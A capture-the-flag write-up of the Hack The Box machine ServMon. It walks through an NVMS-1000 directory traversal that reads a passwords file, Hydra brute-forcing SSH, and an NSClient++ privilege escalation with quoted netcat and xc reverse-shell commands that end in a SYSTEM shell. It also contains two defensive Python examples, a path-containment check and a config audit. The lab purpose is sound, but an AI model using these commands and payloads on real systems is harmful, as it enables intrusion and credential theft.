---
search:
  exclude: true
---

# ServMon Writeup

![](img/45.png)

## Introduction :

ServMon is an easy Windows box released back in April 2020.

## **Part 1 : Initial Enumeration**

As always we begin our enumeration with **Nmap** to find open ports, using the flags **-sC** for default scripts and **-sV** for version detection.

```
[ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon]
→ nmap -sCV 10.10.10.184
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-29 17:22 CEST
Nmap scan report for 10.10.10.184
Host is up (0.053s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
5666/tcp open  tcpwrapped
8443/tcp open  ssl/https-alt
| fingerprint-strings:
|   FourOhFourRequest, HTTPOptions, RTSPRequest, SIPOptions:
|     HTTP/1.1 404
|     Content-Length: 18
|     Document not found
|   GetRequest:
|     HTTP/1.1 302
|     Content-Length: 0
|     Location: /index.md
|     workers
|_    jobs
| http-title: NSClient++
|_Requested resource was /index.md
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2020-01-14T13:24:20
|_Not valid after:  2021-01-13T13:24:20
|_ssl-date: TLS randomness does not represent time
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_smb2-security-mode: SMB: Couldn't find a NetBIOS name that works for the server. Sorry!
|_smb2-time: ERROR: Script execution failed (use -d to debug)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 911.51 seconds

[ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon]
→ nmap -sCV -p21 10.10.10.184
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-29 17:43 CEST
Nmap scan report for 10.10.10.184
Host is up (0.12s latency).

PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_01-18-20  12:05PM       <DIR>          Users
| ftp-syst:
|_  SYST: Windows_NT
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.93 seconds
```

## **Part 2 : Getting User Access**

Our nmap scan picked up FTP on port 21 with anonymous login allowed, so let's examine it:

```
[ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon]
→ wget -r ftp://anonymous:anonymous@10.10.10.184/

[ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon]
→ tree
.
└── 10.10.10.184
    └── Users
        ├── Nadine
        │   └── Confidential.txt
        └── Nathan
            └── Notes to do.txt
```

After recursively downloading everything on the FTP service, we have two potential usernames and two text files:

```
[ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon]
→ cat 10.10.10.184/Users/Nadine/Confidential.txt
Nathan,

I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder.

Regards

Nadine%

[ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon]
→ cat 10.10.10.184/Users/Nathan/Notes\ to\ do.txt
1) Change the password for NVMS - Complete
2) Lock down the NSClient Access - Complete
3) Upload the passwords
4) Remove public access to NVMS
5) Place the secret files in SharePoint%
```

Our nmap scan also picked up port 80:

![](prg/45_002.png)

It looks like an NVMS web interface, so let's check whether there are known exploits for it:

```
[ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon]
→ searchsploit NVMS
------------------------------------------ ---------------------------------
 Exploit Title                            |  Path
------------------------------------------ ---------------------------------
NVMS 1000 - Directory Traversal           | hardware/webapps/47774.txt
OpenVms 5.3/6.2/7.x - UCX POP Server Arbi | multiple/local/21856.txt
OpenVms 8.3 Finger Service - Stack Buffer | multiple/dos/32193.txt
TVT NVMS 1000 - Directory Traversal       | hardware/webapps/48311.py
------------------------------------------ ---------------------------------

[ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon]
→ cat $(locate 47774.txt)
# Title: NVMS-1000 - Directory Traversal
# Date: 2019-12-12
# Author: Numan Türle
# Vendor Homepage: http://en.tvt.net.cn/
# Version : N/A
# Software Link : http://en.tvt.net.cn/products/188.html

POC
---------

GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1
Host: 12.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

Response
---------

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1%
```

NVMS-1000 is vulnerable to directory traversal, so let's test this:

```
[ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon]
→ curl http://10.10.10.184/../../../../../../../../../../../../windows/win.ini
```

Nothing useful comes back, because curl removes the `../` segments from the path before it sends the request (RFC 3986 dot-segment removal), so the server only ever sees `/windows/win.ini`.
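The two behaviours at play here, as an added example that is not code from the writeup or from NVMS-1000: `client_normalise` reproduces the dot-segment removal curl performs by default, `naive_resolve` shows what a server that simply appends the request path to its document root ends up opening, and `safe_resolve` is the containment check a correctly written server applies; `find_traversal_requests` runs that check over a few constructed access-log lines, including a percent-encoded variant. The web root and the log format are assumptions.

```python
import ntpath
import posixpath
from urllib.parse import unquote

WEB_ROOT = r"C:\Program Files\NVMS-1000\WebRoot"  # assumed document root
TRAVERSAL = "/../../../../../../../../../../../../windows/win.ini"  # path from the PoC


def client_normalise(request_path):
    """What curl does by default: remove dot segments (RFC 3986 5.2.4, approximated
    here with posixpath.normpath) before the request leaves the client."""
    return posixpath.normpath(request_path)


def naive_resolve(request_path):
    """Vulnerable pattern: append the request path to the document root and let
    path resolution collapse the '..' segments, which climb out of the root."""
    return ntpath.normpath(WEB_ROOT + request_path)


def safe_resolve(request_path):
    """Hardened pattern: resolve the candidate, then refuse anything not under
    WEB_ROOT.  The leading slash is stripped so ntpath.join cannot treat the
    request as rooted at the drive.  Returns None for a rejected path."""
    root = ntpath.normpath(WEB_ROOT)
    candidate = ntpath.normpath(ntpath.join(root, request_path.lstrip("/\\")))
    if ntpath.commonpath([root, candidate]) != root:
        return None
    return candidate


def is_traversal(raw_path):
    """Percent-decode first so '%2e%2e' is judged exactly like '..'."""
    return safe_resolve(unquote(raw_path)) is None


# Constructed access-log lines in a common-log-like format (not from the box).
SAMPLE_LOG = """\
10.10.14.13 - - [29/May/2021:18:01:02 +0200] "GET /index.html HTTP/1.1" 200 512
10.10.14.13 - - [29/May/2021:18:01:09 +0200] "GET /../../../../../../../../../../../../windows/win.ini HTTP/1.1" 200 92
10.10.14.13 - - [29/May/2021:18:01:15 +0200] "GET /%2e%2e/%2e%2e/%2e%2e/users/Nathan/Desktop/Passwords.txt HTTP/1.1" 200 160
10.10.14.13 - - [29/May/2021:18:01:20 +0200] "GET /css/../main.css HTTP/1.1" 200 3011
"""


def find_traversal_requests(log_text):
    """Return the raw request paths in the log that would escape WEB_ROOT."""
    hits = []
    for line in log_text.splitlines():
        request = line.split('"')[1]   # e.g. GET /index.html HTTP/1.1
        path = request.split(" ")[1]
        if is_traversal(path):
            hits.append(path)
    return hits


if __name__ == "__main__":
    print("client sends :", client_normalise(TRAVERSAL))  # /windows/win.ini
    print("naive resolve:", naive_resolve(TRAVERSAL))     # C:\windows\win.ini
    print("safe resolve :", safe_resolve(TRAVERSAL))      # None
    print("flagged paths:", find_traversal_requests(SAMPLE_LOG))
```

The `/css/../main.css` line is deliberately not flagged: a `..` that stays inside the root is legitimate, so the check is on the resolved location, not on the presence of `..`.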
Passing `--path-as-is` makes curl send the path unchanged, and the traversal works:

```
[ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon]
→ curl http://10.10.10.184/../../../../../../../../../../../../windows/win.ini --path-as-is
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
```

Following the note we found earlier, let's use the directory traversal to reach Passwords.txt on Nathan's desktop:

```
[ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon]
→ curl http://10.10.10.184/../../../../../../../../../../../../users/Nathan/Desktop/Passwords.txt --path-as-is
1nsp3ctTh3Way2Mars!
Th3r34r3To0M4nyTrait0r5!
B3WithM30r4ga1n5tMe
L1k3B1gBut7s@W0rk
0nly7h3y0unGWi11F0l10w
IfH3s4b0Utg0t0H1sH0me
Gr4etN3w5w17hMySk1Pa5$%

[ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon]
→ curl http://10.10.10.184/../../../../../../../../../../../../users/Nathan/Desktop/Passwords.txt --path-as-is > passwords.txt
```

Now we can use Hydra to try these passwords against SSH for both users:

```
[ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon]
→ hydra -L users.txt -P passwords.txt ssh://10.10.10.184
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-05-29 19:23:59
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 14 tasks per 1 server, overall 14 tasks, 14 login tries (l:2/p:7), ~1 try per task
[DATA] attacking ssh://10.10.10.184:22/
[22][ssh] host: 10.10.10.184   login: Nadine   password: L1k3B1gBut7s@W0rk
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-05-29 19:24:01
```

So let's SSH in as the nadine user:

```
[ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon]
→ ssh nadine@10.10.10.184
The authenticity of host '10.10.10.184 (10.10.10.184)' can't be established.
ECDSA key fingerprint is SHA256:l00hI7FlitUwW9ndgFDHLzImSDNxQcjLOKxQPRmbzls.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.184' (ECDSA) to the list of known hosts.
nadine@10.10.10.184's password:
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

nadine@SERVMON C:\Users\Nadine>dir
 Volume in drive C has no label.
 Volume Serial Number is DC93-6115

 Directory of C:\Users\Nadine

08/04/2020  23:16    <DIR>          .
08/04/2020  23:16    <DIR>          ..
18/01/2020  11:23    <DIR>          3D Objects
18/01/2020  11:23    <DIR>          Contacts
08/04/2020  22:28    <DIR>          Desktop
08/04/2020  22:28    <DIR>          Documents
18/01/2020  11:23    <DIR>          Downloads
08/04/2020  22:27    <DIR>          Favorites
08/04/2020  22:27    <DIR>          Links
18/01/2020  11:23    <DIR>          Music
18/01/2020  11:31    <DIR>          OneDrive
18/01/2020  11:23    <DIR>          Pictures
18/01/2020  11:23    <DIR>          Saved Games
18/01/2020  11:23    <DIR>          Searches
18/01/2020  11:23    <DIR>          Videos
               0 File(s)              0 bytes
              15 Dir(s)   6,097,006,592 bytes free

nadine@SERVMON C:\Users\Nadine>type Desktop/user.txt
The syntax of the command is incorrect.

nadine@SERVMON C:\Users\Nadine>cd Desktop

nadine@SERVMON C:\Users\Nadine\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is DC93-6115

 Directory of C:\Users\Nadine\Desktop

08/04/2020  22:28    <DIR>          .
08/04/2020  22:28    <DIR>          ..
29/05/2021  16:31                34 user.txt
               1 File(s)             34 bytes
               2 Dir(s)   6,097,006,592 bytes free

nadine@SERVMON C:\Users\Nadine\Desktop>type user.txt
dbXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
```

And that's it! We managed to get the user flag.

## **Part 3 : Getting Root Access**

Now, in order to get root access on this box, we're going to enumerate it with WinPEAS:

```
[ 10.10.14.13/23 ] [ /dev/pts/38 ] [~/HTB/Servmon]
→ locate winPEAS.bat
/home/nothing/Tools/privilege-escalation-awesome-scripts-suite/winPEAS/winPEASbat/winPEAS.bat

[ 10.10.14.13/23 ] [ /dev/pts/38 ] [~/HTB/Servmon]
→ cp /home/nothing/Tools/privilege-escalation-awesome-scripts-suite/winPEAS/winPEASbat/winPEAS.bat .
```
```
[ 10.10.14.13/23 ] [ /dev/pts/38 ] [~/HTB/Servmon]
→ python3 -m http.server 9090
Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
```

```
nadine@SERVMON C:\Users\Nadine\Desktop>curl "http://10.10.14.13:9090/winPEAS.bat" --output peas.bat
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 35761  100 35761    0     0  35761      0  0:00:01 --:--:--  0:00:01  247k

nadine@SERVMON C:\Users\Nadine\Desktop>cmd /c peas.bat
```

![](prg/45_003.png)

As we look through the winPEAS output for anything interesting, we stumble upon NSClient++:

![](prg/45_004.png)

So let's look for available exploits:

```
[ 10.10.14.13/23 ] [ /dev/pts/38 ] [~/HTB/Servmon]
→ searchsploit nsclient++
----------------------------------------- ---------------------------------
 Exploit Title                           |  Path
----------------------------------------- ---------------------------------
NSClient++ 0.5.2.35 - Authenticated Remo | json/webapps/48360.txt
NSClient++ 0.5.2.35 - Privilege Escalati | windows/local/46802.txt
----------------------------------------- ---------------------------------
Shellcodes: No Results
```

Here we want the privilege escalation one:

```
[ 10.10.14.13/23 ] [ /dev/pts/38 ] [~/HTB/Servmon]
→ cat $(46802.txt)
46802.txt: command not found
^[[A^C

[ 10.10.14.13/23 ] [ /dev/pts/38 ] [~/HTB/Servmon]
→ cat $(locate 46802.txt)
[...]
Exploit:

1. Grab web administrator password

- open c:\program files\nsclient++\nsclient.ini
or
- run the following that is instructed when you select forget password

C:\Program Files\NSClient++>nscp web -- password --display
Current password: SoSecret

2. Login and enable following modules including enable at startup and save configuration

- CheckExternalScripts
- Scheduler

3. Download nc.exe and evil.bat to c:\temp from attacking machine

@echo off
c:\temp\nc.exe 192.168.0.163 443 -e cmd.exe

4. Setup listener on attacking machine

nc -nlvvp 443

5. Add script foobar to call evil.bat and save settings

- Settings > External Scripts > Scripts
- Add New
- foobar
command = c:\temp\evil.bat

6. Add schedulede to call script every 1 minute and save settings

- Settings > Scheduler > Schedules
- Add new
- foobar
interval = 1m
command = foobar

7. Restart the computer and wait for the reverse shell on attacking machine

nc -nlvvp 443
listening on [any] 443 ...
connect to [192.168.0.163] from (UNKNOWN) [192.168.0.117] 49671
Microsoft Windows [Version 10.0.17134.753]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Program Files\NSClient++>whoami
whoami
nt authority\system
```

We could follow these steps by hand, but it is preferable to use the other script (48360.py) to automate them. Either way we start with the first step, grabbing the web password from the config file:

```
nadine@SERVMON C:\Users\Nadine\Desktop>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\Users\Nadine\Desktop> type "c:\program files\nsclient++\nsclient.ini" | findstr password
password = ew2x6SsGTxjRwXOT
```

Next we turn to port 8443, which our nmap scan identified as NSClient++. Browsing to https://10.10.10.184:8443 directly will not let us log in, however, because the config file only allows connections from localhost:

```
PS C:\Users\Nadine\Desktop> type "c:\program files\nsclient++\nsclient.ini" | findstr 127
allowed hosts = 127.0.0.1
```

So we set up an SSH local port forward to reach the service on the box's own loopback interface:

```
[ 10.10.14.13/23 ] [ /dev/pts/38 ] [~/HTB/Servmon]
→ ssh -L 8443:127.0.0.1:8443 nadine@10.10.10.184
nadine@10.10.10.184's password: L1k3B1gBut7s@W0rk
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

nadine@SERVMON C:\Users\Nadine>
```

With the SSH tunnel in place, we can visit the site on its localhost by going to **https://127.0.0.1:8443** and logging in with the **ew2x6SsGTxjRwXOT** password we found earlier:

![](prg/45_013.png)

![](prg/45_014.png)

Once we are logged in, we're going to make sure that we can get a binary onto the box to get a reverse shell from it. And as I have discovered, HTB does not care about its older retired boxes, and does not update or fix them in case a problem like this happens:

![](prg/45_015.png)

Literally every other writeup of this machine uses netcat (x86 or x64 versions), and yet it is not doable on this box. Therefore we need to get a binary onto the box that replicates what netcat does while bypassing whatever is preventing us from getting a reverse shell (privileged or not) from this box; we could hypothesize that this box has flagged several of our netcat binaries, but we can't know for sure. To do so we're going to use [xc](https://github.com/xct/xc), a Go version of netcat written by [xct](https://app.hackthebox.eu/profile/13569):

```
[ 10.10.14.13/23 ] [ /dev/pts/43 ] [~/HTB/Servmon]
→ sudo apt install golang-go

[ 10.10.14.13/23 ] [ /dev/pts/43 ] [~/HTB/Servmon]
→ git clone https://github.com/xct/xc ; cd xc

[ 10.10.14.13/23 ] [ /dev/pts/43 ] [~/HTB/Servmon]
→ go version
go version go1.15.9 linux/amd64
```

We first need Go 1.15+ to be able to compile the xc binary; after cloning the xc repository we follow the setup steps from its README.md:

```
[ 10.10.14.13/23 ] [ /dev/pts/43 ] [HTB/Servmon/xc]
→ go get golang.org/x/sys/...
```
```
[ 10.10.14.13/23 ] [ /dev/pts/43 ] [HTB/Servmon/xc]
→ go get golang.org/x/text/encoding/unicode

[ 10.10.14.13/23 ] [ /dev/pts/43 ] [HTB/Servmon/xc]
→ go get github.com/hashicorp/yamux

[ 10.10.14.13/23 ] [ /dev/pts/43 ] [HTB/Servmon/xc]
→ go get github.com/ropnop/go-clr
package github.com/ropnop/go-clr: build constraints exclude all Go files in /home/nothing/go/src/github.com/ropnop/go-clr

[ 10.10.14.13/23 ] [ /dev/pts/43 ] [HTB/Servmon/xc]
→ pip3 install donut-shellcode
Collecting donut-shellcode
  Downloading donut-shellcode-0.9.2.tar.gz (149 kB)
     |████████████████████████████████| 149 kB 2.0 MB/s
Building wheels for collected packages: donut-shellcode
  Building wheel for donut-shellcode (setup.py) ... done
  Created wheel for donut-shellcode: filename=donut_shellcode-0.9.2-cp39-cp39-linux_x86_64.whl size=56786 sha256=0e6037e945da6f8496c98bdb849a13ca84339af1ef50166a7480d6477d9729b8
  Stored in directory: /home/nothing/.cache/pip/wheels/ac/72/45/1a77c4737812b5635cd958224c0ff623ebcef62c15ef083bab
Successfully built donut-shellcode
Installing collected packages: donut-shellcode
Successfully installed donut-shellcode-0.9.2

[ 10.10.14.13/23 ] [ /dev/pts/43 ] [HTB/Servmon/xc]
→ sudo apt install rlwrap upx -y

[ 10.10.14.13/23 ] [ /dev/pts/43 ] [HTB/Servmon/xc]
→ make

[ 10.10.14.13/23 ] [ /dev/pts/43 ] [HTB/Servmon/xc]
→ ls -lash | grep xc
1.3M -rwxr-xr-x 1 nothing nothing 1.3M May 30 14:03 xc
3.2M -rwxr-xr-x 1 nothing nothing 3.2M May 30 14:03 xc.exe
4.0K -rw-r--r-- 1 nothing nothing 2.7K May 30 14:03 xc.go

[ 10.10.14.13/23 ] [ /dev/pts/43 ] [HTB/Servmon/xc]
→ file xc xc.exe xc.go
xc:     ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), statically linked, no section header
xc.exe: PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
xc.go:  C source, ASCII text
```

We now have xc compiled for both Linux and Windows, so let's test the Linux version:

![](prg/45_016.png)

It works locally, so let's test the Windows version of xc on the box:

```
[ 10.10.14.13/23 ] [ /dev/pts/38 ] [~/HTB/Servmon]
→ python3 -m http.server 9090
```

```
PS C:\Users\Nadine> wget http://10.10.14.13:9090/xc/xc.exe -o c:\temp\xc.exe
PS C:\Users\Nadine> cd c:\temp
PS C:\temp> ./xc.exe 10.10.14.13 9001
2021/05/30 13:59:45 Connected to 10.10.14.13:9001
```

```
[ 10.10.14.13/23 ] [ /dev/pts/3 ] [HTB/Servmon/xc]
→ ./xc -l -p 9001
 __  _____
 \ \/ / __|
  >  < (__
 /_/\_\___|
 by @xct_de
 build: QUnVVFdLYEkibcKx

2021/05/30 14:51:44 Listening on :9001
2021/05/30 14:51:44 Waiting for connections...
2021/05/30 14:52:08 Connection from 10.10.10.184:56967
2021/05/30 14:52:08 Stream established
[*] Auto-Plugins:
[xc: C:\temp]: !shell
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

nadine@SERVMON C:\temp>whoami
whoami
servmon\nadine
```

We have a reverse shell, but only as the nadine user, so let's get a privileged one with the privesc exploit:

```
PS C:\temp> wget http://10.10.14.13:9090/xc/xc.exe -o c:\temp\xc.exe
```

```
[ 10.10.14.13/23 ] [ /dev/pts/3 ] [HTB/Servmon/xc]
→ ./xc -l -p 9001
```

```
[ 10.10.14.13/23 ] [ /dev/pts/5 ] [~/HTB/Servmon]
→ python3 48360.py -t 127.0.0.1 -P 8443 -p ew2x6SsGTxjRwXOT -c "C:\Temp\xc.exe 10.10.14.13 9001"
```

```
[ 10.10.14.13/23 ] [ /dev/pts/3 ] [HTB/Servmon/xc]
→ ./xc -l -p 9001
 __  _____
 \ \/ / __|
  >  < (__
 /_/\_\___|
 by @xct_de
 build: QUnVVFdLYEkibcKx

2021/05/30 15:02:41 Listening on :9001
2021/05/30 15:02:41 Waiting for connections...
2021/05/30 15:03:08 Connection from 10.10.10.184:57375
2021/05/30 15:03:08 Stream established
[*] Auto-Plugins:
[xc: C:\Program Files\NSClient++]: !shell
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\Program Files\NSClient++>whoami
whoami
nt authority\system

C:\Program Files\NSClient++>type C:\Users\Administrator\Desktop\root.txt
type C:\Users\Administrator\Desktop\root.txt
d8XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
```

And that's it! We managed to get the root flag.
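As a defender's takeaway from the chain above (the web password in clear text in nsclient.ini, an `allowed hosts` restriction to loopback that an SSH port forward walks around, and the CheckExternalScripts and Scheduler modules turning the web UI into command execution as SYSTEM), here is an added example, not code from the writeup or from NSClient++, that audits an nsclient.ini for exactly those settings. The ini text is a constructed sample; its section names follow NSClient++'s `[/modules]` and `[/settings/default]` layout.

```python
import configparser

# Constructed nsclient.ini in NSClient++'s section layout (not the file from the box).
SAMPLE_INI = """\
[/modules]
CheckExternalScripts = enabled
Scheduler = enabled
WEBServer = enabled

[/settings/default]
allowed hosts = 127.0.0.1
password = EXAMPLE-NOT-THE-REAL-PASSWORD
"""

ENABLED = {"enabled", "1", "true"}
LOOPBACK = {"127.0.0.1", "::1", "localhost"}


def load_ini(text):
    """NSClient++ uses plain INI syntax with '/'-prefixed section names."""
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_string(text)
    return cp


def section(cp, name):
    """Return the section as a mapping, or an empty dict when it is absent."""
    return cp[name] if cp.has_section(name) else {}


def audit(text):
    """Return a list of findings; an empty list means none of the checked weaknesses."""
    cp = load_ini(text)
    modules = section(cp, "/modules")
    default = section(cp, "/settings/default")
    findings = []
    for mod in ("CheckExternalScripts", "Scheduler"):
        if modules.get(mod, "").lower() in ENABLED:
            findings.append(f"{mod} enabled: anyone with the web password can define "
                            "and run commands as the NSClient++ service account")
    if default.get("password"):
        findings.append("web password stored in clear text in nsclient.ini: make the "
                        "file readable by administrators only")
    hosts = {h.strip() for h in default.get("allowed hosts", "").split(",")}
    if modules.get("WEBServer", "").lower() in ENABLED and hosts <= LOOPBACK:
        findings.append("allowed hosts is loopback only: this filters by source address, "
                        "not by user, so any local logon or SSH port forward reaches the UI")
    return findings


if __name__ == "__main__":
    for finding in audit(SAMPLE_INI):
        print("-", finding)
```

The file ACL itself cannot be checked from the ini text, which is why the password finding points at it: on this box the whole chain started with a low-privilege user being able to read the file.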
## **Conclusion**

Here we can see the progress graph:

![](img/45_graph.png)